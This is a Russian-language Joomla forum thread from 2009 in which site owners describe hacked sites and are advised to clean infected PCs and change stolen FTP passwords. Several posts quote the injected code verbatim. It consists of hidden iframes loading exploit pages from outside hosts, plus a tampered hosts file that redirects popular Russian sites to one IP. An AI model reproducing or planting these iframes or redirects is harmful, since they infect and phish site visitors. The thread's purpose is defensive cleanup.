Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 36 Ответов
  • 6336 Просмотров
*

Etesian

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
Взломали сайт!
« : 14.07.2009, 00:25:03 »
Вчера зайдя на свой сайт увидел интересную картину, а выглядит она так:

После всевозможных попыток это исправить самостоятельно, я обратился к моему хостеру, от которого получил ответ, что мой сайт взломали!
Сталкивался кто-нибудь с подобной проблемой, помогите решить эту проблеу!
« Последнее редактирование: 14.07.2009, 01:04:35 от Sulpher »
*

морок

  • Осваиваюсь на форуме
  • 39
  • 4 / 0
Re: Взломали сайт!
« Ответ #1 : 14.07.2009, 00:43:45 »
Ну адрес бы точно не помешал...
*

Adam.K

  • Захожу иногда
  • 135
  • 3 / 0
  • Чтож со зрением то делать? Совсем испортилось.
Re: Взломали сайт!
« Ответ #2 : 14.07.2009, 00:57:58 »
Так это же защищенное соединение SSL, может ты установил зашифрованное соединение?
*

Sulpher

  • Живу я здесь
  • 2115
  • 401 / 16
  • Шаблоны и расширения Joomla
Re: Взломали сайт!
« Ответ #3 : 14.07.2009, 01:03:53 »
Во первых, на форуме запрещено выделять весь текст жирным шрифтом, во вторых, посмотрите конфигурационный файл, все ли там чисто и, обязательно, .htaccess (возможно там есть строчка DirectoryIndex и переход на др. сайт), в третьих, посмотрите код index.php своего шаблона, нет ли там лишних скриптов? Ну и таким образом, последовательно двигаясь, удастся локализовать проблему и заняться её устранением.
*

Etesian

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
Re: Взломали сайт!
« Ответ #4 : 14.07.2009, 03:25:41 »
Во первых, на форуме запрещено выделять весь текст жирным шрифтом, во вторых, посмотрите конфигурационный файл, все ли там чисто и, обязательно, .htaccess (возможно там есть строчка DirectoryIndex и переход на др. сайт), в третьих, посмотрите код index.php своего шаблона, нет ли там лишних скриптов? Ну и таким образом, последовательно двигаясь, удастся локализовать проблему и заняться её устранением.
Дело в том, что всё вышеприведённое я уже сделал, не помогает, сейчас общаюсь с хостером по этому поводу!
*

Etesian

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
Re: Взломали сайт!
« Ответ #5 : 14.07.2009, 03:29:25 »
Так это же защищенное соединение SSL, может ты установил зашифрованное соединение?

Нет исключено, я настройки не менял никакие, всё прекрасно работало до вчерашнего дня!
*

Etesian

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
Re: Взломали сайт!
« Ответ #6 : 14.07.2009, 03:45:48 »
Обнаружил в папках сайта файлы index.htm с подозрительными значениями:
<iframe src="https://87.242.115.19/exp/" width="0" height="0" style="display:none;"></iframe>
Сейчас занимаюсь чисткой, о результатах отпишусь!
« Последнее редактирование: 14.07.2009, 04:04:19 от Etesian »
*

Etesian

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
Re: Взломали сайт!
« Ответ #7 : 14.07.2009, 05:30:27 »
Вообщем проблема оказалась в этом коде:
<iframe src="https://87.242.115.19/exp/" width="0" height="0" style="display:none;"></iframe>
Как я заметил он присутствовал в файлах index.htm, но и может быть прописан в файлах index.php в последней строке!
« Последнее редактирование: 14.07.2009, 05:35:31 от Etesian »

Re: Взломали сайт!
« Ответ #8 : 14.07.2009, 11:31:47 »
так же и default.php тоже заражаются.
*

Tuco

  • Осваиваюсь на форуме
  • 28
  • 1 / 0
Re: Взломали сайт!
« Ответ #9 : 14.07.2009, 12:01:16 »
можешь сказать - что за хостер и откуда вирус?
с флэшки?
*

..С...е...р...ы...й..

  • Захожу иногда
  • 51
  • 110 / 2
Re: Взломали сайт!
« Ответ #10 : 14.07.2009, 12:02:17 »
просто специальными программами сравните свой дистрибутив с оригинальным - так найдете все изменения до единого файла
*

morpheus

  • Новичок
  • 6
  • 0 / 0
Re: Взломали сайт!
« Ответ #11 : 14.07.2009, 17:09:38 »
Добрый день у меня такая же беда случилась две недели назад. В index.html прописалось вот это <iframe src="http://u5l.ru:8080/index.php" width=171 height=137 style="visibility: hidden"></iframe>. Также, потом в конце файлов php стала дописываться эта гадость. Я снёс сайт, так как вычистить не хватило терпения, позавчера установил сайт с нуля как говориться, закрыл его, и стал настраивать, сегодня в обед заметил, что не открывается главная старница. Помотрел - а там уже <html><body bgcolor="#FFFFFF"><iframe src="http://u6x.ru:8080/index.php" width=142 height=129 style="visibility: hidden"></iframe></body></html><iframe src="http://asfirey.net/?click=988AE7" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>. Разрешения файлов стоят 644. Пароли - поменял. 2 дня продержалось и сдохло. Почему? !!!???!!!
*

voland

  • Легенда
  • 11030
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Взломали сайт!
« Ответ #12 : 14.07.2009, 17:21:11 »
Добрый день у меня такая же беда случилась две недели назад. В index.html прописалось вот это <iframe src="http://u5l.ru:8080/index.php" width=171 height=137 style="visibility: hidden"></iframe>. Также, потом в конце файлов php стала дописываться эта гадость. Я снёс сайт, так как вычистить не хватило терпения, позавчера установил сайт с нуля как говориться, закрыл его, и стал настраивать, сегодня в обед заметил, что не открывается главная старница. Помотрел - а там уже <html><body bgcolor="#FFFFFF"><iframe src="http://u6x.ru:8080/index.php" width=142 height=129 style="visibility: hidden"></iframe></body></html><iframe src="http://asfirey.net/?click=988AE7" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>. Разрешения файлов стоят 644. Пароли - поменял. 2 дня продержалось и сдохло. Почему? !!!???!!!
Потому что на компе вирус!!! Сто раз об этом говорилось - свою машину лечить надо
*

era

  • Администратор
  • 1587
  • 391 / 5
  • В туалете лучше быть пользователем, чем админом.
Re: Взломали сайт!
« Ответ #13 : 14.07.2009, 17:25:55 »
объясняю ситуацию - ТЫ заразился трипаком - и заражаешь свою подругу - потом идёшь и ЕЁ лечишь, Через два дня прибегаешь к доктору и ругаешься почему это она опять трипаком заболела? вроде на цепи её дома держал и никто не мог принести его в дом :)
*

Etesian

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
Re: Взломали сайт!
« Ответ #14 : 14.07.2009, 17:46:33 »
можешь сказать - что за хостер и откуда вирус?
с флэшки?
Хостер всем известный РБК! Вирус точно сказать не могу откуда, но вполне может быть, то что он залез через FTP! Так бывает чаще всего, хотя самое странное, что до вчерашнего дня у меня на компе ничего не обнаруживалось, но потом стали предупреждения вылезать! Хотя возможно что сам вирус ко мне попал на комп, когда, кто-то из моей семьи сидел за ним и лазил, где не стоит!
С флэшкой вариант тоже рассматривается! тут не угадаешь!
« Последнее редактирование: 14.07.2009, 17:56:57 от Etesian »
*

Etesian

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
Re: Взломали сайт!
« Ответ #15 : 14.07.2009, 17:50:05 »
Добрый день у меня такая же беда случилась две недели назад. В index.html прописалось вот это <iframe src="http://u5l.ru:8080/index.php" width=171 height=137 style="visibility: hidden"></iframe>. Также, потом в конце файлов php стала дописываться эта гадость. Я снёс сайт, так как вычистить не хватило терпения, позавчера установил сайт с нуля как говориться, закрыл его, и стал настраивать, сегодня в обед заметил, что не открывается главная старница. Помотрел - а там уже <html><body bgcolor="#FFFFFF"><iframe src="http://u6x.ru:8080/index.php" width=142 height=129 style="visibility: hidden"></iframe></body></html><iframe src="http://asfirey.net/?click=988AE7" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>. Разрешения файлов стоят 644. Пароли - поменял. 2 дня продержалось и сдохло. Почему? !!!???!!!
Возможно дело в твоей системе, может быть какой-нибудь вирус!
*

Etesian

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
Re: Взломали сайт!
« Ответ #16 : 14.07.2009, 17:52:57 »
Когда занимался ипсравлением сайта, дабы выявить все проблемы я ещё проверил файл hosts который находится C:\WINDOWS\system32\drivers\etc и там было обнаружено следующее:
91.189.113.143 mail.ru
91.189.113.143 www.mail.ru
91.189.113.143 www.yandex.ru
91.189.113.143 yandex.ru
91.189.113.143 www.vkontakte.ru
91.189.113.143 vkontakte.ru
91.189.113.143 www.odnoklasniki.ru
91.189.113.143 odnoklasniki.ru
Так что проверьте его тоже!
 ^-^ ^-^ ^-^ ^-^
*

Etesian

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
Re: Взломали сайт!
« Ответ #17 : 14.07.2009, 17:58:16 »
просто специальными программами сравните свой дистрибутив с оригинальным - так найдете все изменения до единого файла
А ты не подскажешь, как называются эти программы?
*

morpheus

  • Новичок
  • 6
  • 0 / 0
Re: Взломали сайт!
« Ответ #18 : 14.07.2009, 17:59:58 »
Возможно дело в твоей системе, может быть какой-нибудь вирус!
А каким антивирусом проверять? У меня стоит DrWEB в связке с Outpostom/ обновляю каждый час. Где искать вирус?
*

Etesian

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
Re: Взломали сайт!
« Ответ #19 : 14.07.2009, 18:15:16 »
morpheus, попробуй Dr.Web CureIt! http://www.freedrweb.com/download+cureit/
Он всё отыскал у меня на компьютере, теперь спокойно работаю"!
*

voland

  • Легенда
  • 11030
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Взломали сайт!
« Ответ #20 : 14.07.2009, 18:24:09 »
А каким антивирусом проверять? У меня стоит DrWEB в связке с Outpostom/ обновляю каждый час. Где искать вирус?
Если машина уже заражена можно прогнать AVZ либо свежим CureIt в режиме из-под другой ОС - например из под Win PE 
*

aspidy

  • Завсегдатай
  • 1008
  • 55 / 1
  • Миграция joomla 1.0-1.5-2.5
Re: Взломали сайт!
« Ответ #21 : 14.07.2009, 18:52:51 »
Цитировать
Если машина уже заражена
Коды ворует троян, если он китаец сносить придется все
Мелкий ремонт. skype poisk-plus
*

voland

  • Легенда
  • 11030
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Взломали сайт!
« Ответ #22 : 14.07.2009, 19:09:19 »
Коды ворует троян, если он китаец сносить придется все
в курсе что такое руткит? перехваты функций? запуск в нулевом кольце? нет?
Тогда открою секрет что сносить все - это вариант когда нельзя победить вирус (процента 2 отвсех вирусов - и они обычно не воруют пароли)
*

aspidy

  • Завсегдатай
  • 1008
  • 55 / 1
  • Миграция joomla 1.0-1.5-2.5
Re: Взломали сайт!
« Ответ #23 : 14.07.2009, 19:14:57 »
Цитировать
в курсе что такое руткит?
В курсе. Есть разница между "сайт сломали" и " прихватил вирус".
Мелкий ремонт. skype poisk-plus
*

era

  • Администратор
  • 1587
  • 391 / 5
  • В туалете лучше быть пользователем, чем админом.
Re: Взломали сайт!
« Ответ #24 : 14.07.2009, 19:18:54 »
ой, я смотрю тут все специалисты по безопасности и просто злобные хаЦкеры, словами страшными перематюговываются :)
*

voland

  • Легенда
  • 11030
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Взломали сайт!
« Ответ #25 : 14.07.2009, 19:27:37 »
В курсе. Есть разница между "сайт сломали" и " прихватил вирус".
В данном случае не сломали сайт - а тупо украден пароль на ftp. И лечить надо причину
*

Etesian

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
Re: Взломали сайт!
« Ответ #26 : 14.07.2009, 21:56:56 »
В данном случае не сломали сайт - а тупо украден пароль на ftp. И лечить надо причину
Уже всё исправлено и выличено!  Будем надеятся, что дальше такого не произойдёт! Но для большей безопасности придётся переустанавливать систему!
« Последнее редактирование: 14.07.2009, 22:53:38 от Etesian »
*

morpheus

  • Новичок
  • 6
  • 0 / 0
Re: Взломали сайт!
« Ответ #27 : 14.07.2009, 23:29:01 »
Спасибо, Народ! Щас сканю ящик свой, нашёл 3 трояна. Поменяю пароль на фтп. посмотрим что получится.
*

Etesian

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
Re: Взломали сайт!
« Ответ #28 : 15.07.2009, 04:12:14 »
Самое странное, что NOD32 даже не заметил ничего!
*

aspidy

  • Завсегдатай
  • 1008
  • 55 / 1
  • Миграция joomla 1.0-1.5-2.5
Re: Взломали сайт!
« Ответ #29 : 15.07.2009, 04:55:44 »
Цитировать
нашёл 3 трояна.
Кто-то говорил про перехват?
Мелкий ремонт. skype poisk-plus
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 353
Последний ответ 31.03.2024, 16:14:32
от SeBun
Netflix! - Клиент поймал фишинг на старый сайт. Где порылись собаки?

Автор Alex_gs

Ответов: 9
Просмотров: 1656
Последний ответ 05.11.2021, 21:47:31
от wishlight
Взломали сайт. Как в некоторых случаях делаю я

Автор cntrl

Ответов: 0
Просмотров: 640
Последний ответ 29.08.2020, 00:25:24
от cntrl
Безопасный вход на сайт Joomla и админка

Автор jm

Ответов: 9
Просмотров: 1448
Последний ответ 19.07.2020, 23:57:17
от wishlight
[Руководство] Как защитить сайт на версии 1.5 (не поддерживается разработчиками)

Автор flyingspook

Ответов: 13
Просмотров: 5903
Последний ответ 08.01.2020, 12:52:55
от winstrool